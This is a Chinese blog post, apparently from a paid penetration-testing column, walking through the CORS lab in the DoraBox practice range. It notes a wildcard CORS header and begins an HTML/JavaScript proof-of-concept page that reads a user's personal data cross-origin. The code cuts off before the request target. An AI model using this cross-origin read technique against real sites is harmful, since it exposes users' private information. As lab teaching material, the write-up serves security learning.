【漏洞挖掘】——38、DoraBox中CORS靶场

FLy_鹏程万里

于 2024-06-06 17:41:52 发布

阅读量20

点赞数

分类专栏：【WEB渗透】文章标签：渗透测试信息安全网络安全

本文链接：https://blog.csdn.net/Fly_hps/article/details/139506326

版权

【WEB渗透】专栏收录该内容

126 篇文章 5 订阅 ¥29.90 ¥99.00

订阅专栏

源码分析

首先查看一下cors设计代码，从下面可以看到"Access-Control-Allow：*"这个CORS配置：

然后访问一下该页面，可以从下面的页面查看到有用户的个人信息：

漏洞利用

下面构造CORS.html页面来读取信息：

<!DOCTYPE html>
<html>
<body>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open(

了解本专栏